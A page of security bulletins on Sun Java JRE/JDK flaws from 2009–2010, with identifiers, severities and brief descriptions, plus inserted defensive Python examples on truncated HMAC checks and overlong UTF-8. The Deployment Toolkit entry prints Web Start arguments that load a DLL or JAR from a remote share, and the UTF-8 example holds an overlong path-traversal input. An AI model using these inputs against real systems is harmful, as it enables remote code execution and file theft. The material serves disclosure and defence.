The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Sun Java

security vulnerability CVE-2010-0887

Java JRE/JDK 6: code execution via Java Plug-in

Synthesis of the vulnerability

An attacker can create an HTML page containing a malicious Java applet, in order to execute code on the victim's computer.
Severity: 3/4.
Creation date: 16/04/2010.
Identifiers: BID-39492, CVE-2010-0887, RHSA-2010:0356-02, RHSA-2010:0549-01, VIGILANCE-VUL-9594.

Description of the vulnerability

The Java Plug-in is called to display Java applets contained in an HTML page.

An unknown vulnerability of the Java Plug-in can be used to execute code. Versions 6 Update 18 and 19 are impacted on Windows, Solaris and Linux, installed on a 32-bit processor.

An attacker can therefore create an HTML page containing a malicious Java applet, in order to execute code on the victim's computer.

security alert CVE-2010-0886 CVE-2010-1423

Java JRE/JDK 6: code execution via Java Deployment Toolkit

Synthesis of the vulnerability

When Java Deployment Toolkit is installed, an attacker can create an HTML document executing Java code or a shell command.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 2.
Creation date: 12/04/2010.
Revision date: 15/04/2010.
Identifiers: 2508272, BID-39346, CVE-2010-0886, CVE-2010-1423, MS11-027, RHSA-2010:0356-02, VIGILANCE-VUL-9569, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#886582.

Description of the vulnerability

The Java Deployment Toolkit is installed as an ActiveX control (Internet Explorer) or an NPAPI plugin (Firefox), in order to distribute Java applications using JNLP files.

The launch() method and the launchjnlp parameter of the Java Deployment Toolkit specify the parameters that are passed to Java Web Start.

However, Java Web Start accepts some dangerous parameters:
 - to load a DLL: -J-XXaltjvm=\\1.2.3.4\evil.dll
 - to use a JAR archive: -J-jar -J\\1.2.3.4\exploit.jar

An attacker can therefore create an HTML document which calls the Java Deployment Toolkit, and through it Java Web Start, in order to execute code.

security vulnerability CVE-2009-3555 CVE-2009-3910 CVE-2010-0082

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 5.
Creation date: 31/03/2010.
Identifiers: BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39093, BID-39094, BID-39095, BID-39096, BID-39559, c02122104, c03405642, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-192, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CERTA-2012-AVI-395, CVE-2009-3555, CVE-2009-3910, CVE-2010-0082, CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, FEDORA-2010-6025, FEDORA-2010-6039, FEDORA-2010-6279, HPSBMU02799, HPSBUX02524, javacpumar2010, MDVSA-2010:084, RHSA-2010:0337-01, RHSA-2010:0338-01, RHSA-2010:0339-01, RHSA-2010:0383-01, RHSA-2010:0408-01, RHSA-2010:0471-01, RHSA-2010:0489-01, RHSA-2010:0574-01, RHSA-2010:0586-01, RHSA-2010:0865-02, SSRT100089, SSRT100867, SUSE-SA:2010:026, SUSE-SA:2010:028, SUSE-SR:2010:008, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:017, VIGILANCE-VUL-9550, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061.

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK. The most severe vulnerabilities lead to code execution.

Twenty-four vulnerabilities lead to code execution. [severity:3/4; BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39094, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CVE-2009-3555, CVE-2010-0082, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0090, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061]

An attacker can obtain sensitive information. [severity:2/4; BID-39093, CERTA-2010-AVI-192, CVE-2010-0084]

An attacker can generate a denial of service of Java Web Start. [severity:2/4; BID-39095, CVE-2010-0089]

An attacker can obtain sensitive information. [severity:2/4; BID-39096, CVE-2010-0091]

A buffer overflow of HsbParser.getSoundBank() leads to code execution. [severity:3/4; BID-39559, CVE-2009-3910]

computer vulnerability announce CVE-2009-2625

Apache Xerces2 Java, Java JRE/JDK, OpenJDK: memory corruption via XML

Synthesis of the vulnerability

An attacker can create XML data containing a malicious byte which corrupts the memory, in order to create a denial of service or to execute code in Apache Xerces2 Java, Java JRE/JDK or OpenJDK.
Severity: 3/4.
Creation date: 10/08/2009.
Revision date: 09/12/2009.
Identifiers: 272209, 6870754, BID-35958, CVE-2009-2625, DSA-1984-1, FICORA #245608, HPSBUX02476, MDVSA-2011:108, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1505-01, RHSA-2009:1582-01, RHSA-2009:1615-01, RHSA-2011:0858-01, RHSA-2012:0725-01, RHSA-2012:1232-01, RHSA-2012:1537-01, RHSA-2013:0763-01, SSA:2011-041-02, SSRT090250, SUSE-SR:2009:014, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:014, SUSE-SR:2010:015, VIGILANCE-VUL-8925.

Description of the vulnerability

The Apache Xerces2 Java, Java JRE/JDK and OpenJDK products manage XML data. They share the same vulnerability.

An attacker can create XML data containing a malicious byte which corrupts the memory, in order to create a denial of service or to execute code in these products.

computer vulnerability bulletin CVE-2009-3728 CVE-2009-3729 CVE-2009-3864

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 04/11/2009.
Revision date: 12/11/2009.
Identifiers: 269868, 269869, 269870, 270474, 270475, 270476, 6631533, 6636650, 6657026, 6657138, 6664512, 6815780, 6822057, 6824265, 6854303, 6862968, 6862969, 6862970, 6863503, 6864911, 6869694, 6869752, 6870531, 6872357, 6872358, 6872824, 6874643, BID-36881, c01997760, c03005726, c03405642, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CERTA-2012-AVI-395, CVE-2009-3728, CVE-2009-3729, CVE-2009-3864, CVE-2009-3865, CVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882, CVE-2009-3883, CVE-2009-3884, CVE-2009-3886, FEDORA-2009-11486, FEDORA-2009-11490, HPSBMU02703, HPSBMU02799, HPSBUX02503, MDVSA-2010:084, RHSA-2009:1560-01, RHSA-2009:1571-01, RHSA-2009:1584-01, RHSA-2009:1643-01, RHSA-2009:1647-01, RHSA-2009:1662-01, RHSA-2009:1694-01, RHSA-2010:0043-01, RHSA-2010:0408-01, SSRT100019, SSRT100242, SSRT100867, SUSE-SA:2009:058, SUSE-SA:2010:002, SUSE-SA:2010:003, SUSE-SA:2010:004, VIGILANCE-VUL-9156, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, ZDI-09-076, ZDI-09-077, ZDI-09-078, ZDI-09-079, ZDI-09-080.

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK.

The Java Update mechanism on non-English versions does not update the JRE when a new version is available. [severity:1/4; 269868, 6869694, BID-36881, CVE-2009-3864]

A command execution vulnerability in the Java Runtime Environment Deployment Toolkit can be used in order to execute arbitrary code. [severity:3/4; 269869, 6869752, BID-36881, CVE-2009-3865]

A vulnerability in the Java Web Start Installer may be leveraged to allow untrusted Java Web Start Application to run as a trusted application. [severity:3/4; 269870, 6869752, 6872824, BID-36881, CVE-2009-3866, ZDI-09-077]

Multiple buffer and integer overflow vulnerabilities in the Java Runtime Environment with processing audio and image files may allow an untrusted applet or Java Web Start application to escalate privileges. [severity:3/4; 270474, 6854303, 6862968, 6862969, 6862970, 6872357, 6872358, 6874643, BID-36881, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, ZDI-09-076, ZDI-09-078, ZDI-09-079, ZDI-09-080]

A security vulnerability in the Java Runtime Environment with verifying HMAC digests may allow authentication to be bypassed. [severity:3/4; 270475, 6863503, BID-36881, CVE-2009-3875]

A vulnerability in the Java Runtime Environment with decoding DER encoded data may allow a remote client to cause the JRE on the server to run out of memory, resulting in a DoS (Denial of Service) condition. [severity:3/4; 270476, 6864911, BID-36881, CVE-2009-3876]

A vulnerability in the Java Runtime Environment with parsing HTTP headers may allow a remote client to cause the JRE on the server to run out of memory, resulting in a DoS (Denial of Service) condition. [severity:3/4; 270476, 6864911, BID-36881, CVE-2009-3877]

An attacker can use the ICC_Profile.getInstance() method to detect if a file is present. [severity:1/4; 6631533, CVE-2009-3728]

An attacker can use a TrueType font, in order to generate a denial of service. [severity:1/4; 6815780, CVE-2009-3729]

An attacker can use a vulnerability of X11 and Win32GraphicsDevice. [severity:2/4; 6822057, CVE-2009-3879]

An attacker can use Component, KeyboardFocusManager and DefaultKeyboardFocusManager of AWT (Abstract Window Toolkit), in order to obtain sensitive data. [severity:2/4; 6664512, CVE-2009-3880]

An attacker can obtain information via ClassLoader. [severity:3/4; 6636650, CVE-2009-3881]

An attacker can obtain information via Swing. [severity:2/4; 6657026, CVE-2009-3882]

An attacker can obtain information via Windows Pluggable Look and Feel. [severity:2/4; 6657138, CVE-2009-3883]

An attacker can use the TimeZone.getTimeZone() method to detect if a file exists. [severity:2/4; 6824265, CVE-2009-3884]

An attacker can use a vulnerability of a signed JAR. [severity:2/4; 6870531, CVE-2009-3886]

computer threat note CVE-2009-0217 CVE-2009-0901 CVE-2009-1896

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 05/08/2009.
Revision date: 07/08/2009.
Identifiers: 263408, 263409, 263428, 263429, 263488, 263489, 263490, 264648, 6406003, 6429594, 6444262, 6446522, 6738524, 6755840, 6782979, 6801071, 6801497, 6805231, 6818787, 6823373, 6824440, 6830335, 6845701, 6848964, 6849518, 6862844, BID-35671, BID-35828, BID-35830, BID-35832, BID-35922, BID-35939, BID-35942, BID-35943, BID-35944, BID-35945, BID-35946, BID-35958, CERTA-2009-AVI-279, CERTA-2009-AVI-300, CERTA-2009-AVI-312, CERTA-2009-AVI-365, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-452, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CERTA-2010-AVI-253, CVE-2009-0217, CVE-2009-0901, CVE-2009-1896, CVE-2009-2475, CVE-2009-2476, CVE-2009-2493, CVE-2009-2495, CVE-2009-2625, CVE-2009-2670, CVE-2009-2671, CVE-2009-2672, CVE-2009-2673, CVE-2009-2674, CVE-2009-2675, CVE-2009-2676, CVE-2009-2689, CVE-2009-2690, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724, FEDORA-2009-8329, FEDORA-2009-8337, HPSBUX02476, MDVSA-2009:209, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1236-01, RHSA-2009:1582-01, RHSA-2009:1662-01, RHSA-2010:0043-01, SSRT090250, SUSE-SA:2009:043, SUSE-SA:2009:053, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:012, SUSE-SR:2010:015, VIGILANCE-VUL-8916, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, VU#456745, VU#466161, ZDI-09-049, ZDI-09-050.

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK.

A vulnerability of the audio system can be used to access "java.lang.System" properties. [severity:1/4; 263408, 6738524, BID-35939, CERTA-2009-AVI-365, CVE-2009-2670]

When a SOCKS proxy is used, an applet/application can determine the name of the current user. [severity:2/4; 263409, 6801071, BID-35943, CVE-2009-2671]

When a proxy is used, an applet/application can read cookies. [severity:3/4; 263409, 6801071, BID-35943, CVE-2009-2672]

When a proxy is used, a malicious applet/application can connect to a server different than its origin server. [severity:2/4; 263409, 6801497, BID-35943, CVE-2009-2673]

When a malicious JPEG image is parsed by a Java applet/application, an integer overflow occurs, and leads to code execution. [severity:3/4; 263428, 6823373, BID-35942, CVE-2009-2674, ZDI-09-050]

The XMLDsig recommendation allows an attacker to bypass the signature of an XML document (VIGILANCE-VUL-8864). [severity:3/4; 263429, 6824440, BID-35671, CERTA-2009-AVI-279, CERTA-2009-AVI-452, CERTA-2010-AVI-253, CVE-2009-0217, VU#466161]

When a malicious Unpack200 archive is opened by the JAR utility in a Java applet/application, an integer overflow occurs, and leads to code execution. [severity:3/4; 263488, 6830335, BID-35944, CVE-2009-2675, ZDI-09-049]

An attacker can create malformed XML data, in order to corrupt the memory (VIGILANCE-VUL-8925). [severity:3/4; 263489, 6845701, BID-35958, CERTA-2009-AVI-312, CVE-2009-2625]

A malicious applet can use JNLPAppletLauncher to upload and execute another applet. [severity:3/4; 263490, 6782979, BID-35946, CVE-2009-2676]

The Java Web Start ActiveX uses a vulnerable version of the Active Template Library (VIGILANCE-VUL-8895). [severity:3/4; 264648, 6862844, BID-35828, BID-35830, BID-35832, BID-35945, CERTA-2009-AVI-300, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CVE-2009-0901, CVE-2009-2493, CVE-2009-2495, VU#456745]

Some versions of WebStart execute unsigned code. [severity:3/4; CVE-2009-1896]

An attacker can use variables to obtain information. [severity:2/4; CVE-2009-2475]

An attacker can bypass access restrictions of OpenType. [severity:3/4; CVE-2009-2476]

An attacker can use JDK13Services to access some objects. [severity:2/4; CVE-2009-2689]

An attacker can obtain information on private variables. [severity:2/4; CVE-2009-2690]

Several minor vulnerabilities were also announced. [severity:2/4; 6406003, 6429594, 6444262, 6446522, 6755840, 6805231, 6818787, 6848964, 6849518, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724]

vulnerability note CVE-2009-0217

XML: bypassing signature

Synthesis of the vulnerability

The XMLDsig recommendation allows an attacker to bypass the signature of an XML document.
Severity: 3/4.
Creation date: 15/07/2009.
Identifiers: 269208, 47526, 6868619, 981343, BID-35671, CVE-2009-0217, DSA-1849-1, FEDORA-2009-8121, FEDORA-2009-8157, FEDORA-2009-8456, FEDORA-2009-8473, HPSBUX02476, MDVSA-2009:267, MDVSA-2009:268, MDVSA-2009:269, MDVSA-2009:318, MDVSA-2009:322, MS10-041, PK80596, PK80627, RHSA-2009:1428-01, SSRT090250, VIGILANCE-VUL-8864, VU#466161.

Description of the vulnerability

The W3C XMLDsig (XML Signature Syntax and Processing) recommendation indicates how to sign XML documents.

HMAC algorithms are used to sign a document, with a key and a hash algorithm.

The XMLDsig ds:HMACOutputLength parameter indicates the number of hash bits which are used on signed data. The recipient of the XML document thus checks only these first bits of the hash.

However, the specification does not define a minimum size. An attacker can therefore send a document signed with a ds:HMACOutputLength value of one, in order to force the recipient to check only one bit.

Several XMLDsig implementations follow the recommendation and do not impose a minimum. These implementations are thus vulnerable.
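The truncation problem described above, as an added Python example (not code from the bulletin or from any XMLDsig implementation): a verifier that honours ds:HMACOutputLength with no minimum, next to one that enforces a floor. The function names, the key and the document are constructed; the floor used (the larger of 80 bits and half the hash output) is an assumption taken from later W3C guidance, not from this page.

```python
import hashlib
import hmac

FLOOR_BITS = 80  # assumption: floor from later W3C guidance, not stated on this page


def _prefix_bits_equal(expected: bytes, supplied: bytes, bits: int) -> bool:
    """Constant-time comparison of the first `bits` bits of two tags."""
    nbytes = (bits + 7) // 8
    if bits < 0 or nbytes > len(expected) or len(supplied) != nbytes:
        return False
    exp, sup = bytearray(expected[:nbytes]), bytearray(supplied)
    if bits % 8:
        # Ignore the unused low bits of the last byte.
        mask = (0xFF << (8 - bits % 8)) & 0xFF
        exp[-1] &= mask
        sup[-1] &= mask
    return hmac.compare_digest(bytes(exp), bytes(sup))


def verify_naive(key: bytes, data: bytes, tag: bytes, output_bits: int,
                 digestmod: str = "sha256") -> bool:
    """Honours the sender-chosen output length with no minimum (vulnerable)."""
    expected = hmac.new(key, data, digestmod).digest()
    return _prefix_bits_equal(expected, tag, output_bits)


def verify_hardened(key: bytes, data: bytes, tag: bytes, output_bits: int,
                    digestmod: str = "sha256") -> bool:
    """Rejects any output length below the floor before comparing."""
    digest_bits = hashlib.new(digestmod).digest_size * 8
    minimum = max(FLOOR_BITS, digest_bits // 2)
    if not minimum <= output_bits <= digest_bits:
        return False
    expected = hmac.new(key, data, digestmod).digest()
    return _prefix_bits_equal(expected, tag, output_bits)


if __name__ == "__main__":
    key = b"constructed-shared-key"           # constructed sample key
    doc = b"<order><amount>10</amount></order>"  # constructed sample document
    # With a 1-bit output length only two tag values exist, so one of them
    # always verifies even though the sender never knew the key.
    for guess in (b"\x00", b"\x80"):
        print(guess.hex(), "naive:", verify_naive(key, doc, guess, 1),
              "hardened:", verify_hardened(key, doc, guess, 1))
```
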

computer vulnerability alert 8662

Java: memory corruption

Synthesis of the vulnerability

A malicious Java applet can corrupt the memory in order to execute code.
Severity: 3/4.
Creation date: 22/04/2009.
Identifiers: TZO-12-200, VIGILANCE-VUL-8662.

Description of the vulnerability

A malicious Java applet can corrupt the memory in order to execute code.

computer threat note CVE-2006-2426 CVE-2009-1093 CVE-2009-1094

Java JDK/JRE/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities were announced in Java JDK/JRE/SDK.
Severity: 4/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 26/03/2009.
Identifiers: 254569, 254570, 254571, 254608, 254609, 254610, 254611, 6522586, 6630639, 6632886, 6636360, 6646860, 6706490, 6717680, 6724331, 6737315, 6782871, 6792554, 6798948, 6804996, 6804997, 6804998, 6804999, BID-34240, c01745133, c01805643, CERTA-2010-AVI-043, CERTA-2010-AVI-217, CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, CVE-2009-1107, DSA-1769-1, FEDORA-2009-3058, HPSBMA02445, HPSBUX02429, MDVSA-2009:137, MDVSA-2009:162, RHSA-2009:0377-01, RHSA-2009:0392-01, RHSA-2009:0394-01, RHSA-2009:1038-01, RHSA-2009:1198-02, RHSA-2009:1662-01, SSRT090058, SUSE-SA:2009:016, SUSE-SA:2009:029, SUSE-SA:2009:036, SUSE-SR:2009:011, VIGILANCE-VUL-8564, VMSA-2009-0014, VMSA-2009-0014.1, VMSA-2009-0014.2, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3.

Description of the vulnerability

Several vulnerabilities were announced in Java JDK/JRE/SDK.

A client can initialize a connection in a special way in order to create a denial of service on the LDAP server. [severity:2/4; 254569, 6717680, CERTA-2010-AVI-043, CVE-2009-1093]

A malicious LDAP server can create a denial of service on the client. [severity:3/4; 254569, 6737315, CVE-2009-1094]

Several overflows in the unpack200 JAR extraction utility lead to code execution. [severity:4/4; 254570, 6792554, CVE-2009-1095, CVE-2009-1096]

A malicious PNG image creates an integer overflow leading to code execution. [severity:4/4; 254571, 6804996, CVE-2009-1097]

Java Web Start displays an image when it starts ("splash screen"). A malicious GIF image creates a decoding error leading to code execution. [severity:4/4; 254571, 6804997]

A malicious GIF image creates an error during the calculation of an offset, which corrupts the memory and leads to code execution. [severity:4/4; 254571, 6804998, CVE-2009-1098]

A malicious font forces the usage of a negative integer, and then a write before the allocated buffer, which leads to code execution. [severity:4/4; 254571, 6804999]

The usage of a malicious font file consumes a large amount of disk space. [severity:2/4; 254608, 6522586]

The usage of a malicious font file consumes a large amount of disk space. [severity:2/4; 254608, 6632886]

A remote attacker can create a denial of service via HTTP on JAX-WS Service Endpoint. [severity:2/4; 254609, 6630639, CVE-2009-1101]

An error in the code generation can be used by a malicious applet to execute code on the computer. [severity:4/4; 254610, 6636360, CVE-2009-1102]

An error in the Java Plug-in deserialization can be used by an applet to execute code. [severity:4/4; 254611, 6646860, CVE-2009-1103]

JavaScript code can use the Plug-in to connect to ports of the system via LiveConnect. [severity:3/4; 254611, 6724331, CVE-2009-1104]

An applet can request to be executed on a vulnerable JRE version. [severity:2/4; 254611, 6706490, CERTA-2010-AVI-217, CVE-2009-1105]

An applet can connect to sites providing crossdomain.xml. [severity:2/4; 254611, 6798948, CVE-2009-1106]

A signed applet can obscure the content of a dialog box and invite the victim to click. [severity:1/4; 254611, 6782871, CVE-2009-1107]

security vulnerability CVE-2008-5351

Java JDK/JRE/SDK: un-normalized UTF-8

Synthesis of the vulnerability

The UTF-8 decoder of Java JDK/JRE/SDK accepts long formats, which can be used to bypass security restrictions.
Severity: 3/4.
Creation date: 21/01/2009.
Identifiers: 245246, 4486841, CVE-2008-5351, FEDORA-2008-10860, FEDORA-2008-10913, RHSA-2008:1018-01, RHSA-2008:1025-01, RHSA-2009:0015-01, RHSA-2009:0016-01, RHSA-2009:0445-01, SUSE-SA:2009:001, SUSE-SR:2009:010, VIGILANCE-VUL-8406.

Description of the vulnerability

The UTF-8 encoding is used to represent Unicode characters on several bytes:
 - 1 to 7 bits: 0xxxxxxx
 - 8 to 11 bits: 110xxxxx 10xxxxxx
 - 12 to 16 bits: 1110xxxx 10xxxxxx 10xxxxxx
 - 17 to 21 bits: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
UTF-8 limits the encoding to 4 bytes and forbids usage of more bytes than necessary.

The UTF-8 decoder of Java JDK/JRE/SDK does not check if UTF-8 encodings are normalized. For example, the "." character must only be represented as 0x2E (b00101110) and not as 0xC0-0xAE (b11000000 10101110).

An attacker can therefore use a long UTF-8 format, in order to bypass security restrictions.
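The normalization check described above, as an added Python example (not the JDK's decoder and not code from the bulletin): one decoder run in a lenient mode that models the missing check and in a strict mode that rejects long forms, plus a path check that decodes strictly before filtering. All names and the sample path are constructed.

```python
# Smallest code point that legitimately needs an n-byte sequence.
MIN_CODE_POINT = {1: 0x00, 2: 0x80, 3: 0x800, 4: 0x10000}


def decode_utf8(data: bytes, strict: bool = True) -> str:
    """Decode UTF-8; with strict=True reject non-shortest ("long") forms."""
    out, i = [], 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            n, cp = 1, lead
        elif lead >> 5 == 0b110:
            n, cp = 2, lead & 0x1F
        elif lead >> 4 == 0b1110:
            n, cp = 3, lead & 0x0F
        elif lead >> 3 == 0b11110:
            n, cp = 4, lead & 0x07
        else:
            raise ValueError(f"invalid lead byte 0x{lead:02X} at offset {i}")
        tail = data[i + 1:i + n]
        if len(tail) != n - 1 or any(t >> 6 != 0b10 for t in tail):
            raise ValueError(f"bad continuation bytes at offset {i}")
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if strict:
            if cp < MIN_CODE_POINT[n]:
                raise ValueError(f"long form of U+{cp:04X} at offset {i}")
            if cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
                raise ValueError(f"code point U+{cp:04X} not allowed")
        out.append(chr(cp))
        i += n
    return "".join(out)


def path_allowed_bytes_only(raw: bytes) -> bool:
    """Weak pattern: filter the raw bytes, leave decoding to a later layer."""
    return b".." not in raw


def path_allowed_hardened(raw: bytes) -> bool:
    """Decode strictly first, then check the decoded path components."""
    try:
        text = decode_utf8(raw, strict=True)
    except ValueError:
        return False
    return ".." not in text.split("/")


# Constructed sample: "." written as the long form 0xC0 0xAE from the text.
SAMPLE = b"docs/\xc0\xae\xc0\xae/secret.txt"

if __name__ == "__main__":
    print("byte filter allows:", path_allowed_bytes_only(SAMPLE))
    print("lenient decode    :", decode_utf8(SAMPLE, strict=False))
    print("hardened allows   :", path_allowed_hardened(SAMPLE))
```

Python's built-in decoder is already strict: `b"\xc0\xae".decode("utf-8")` raises UnicodeDecodeError.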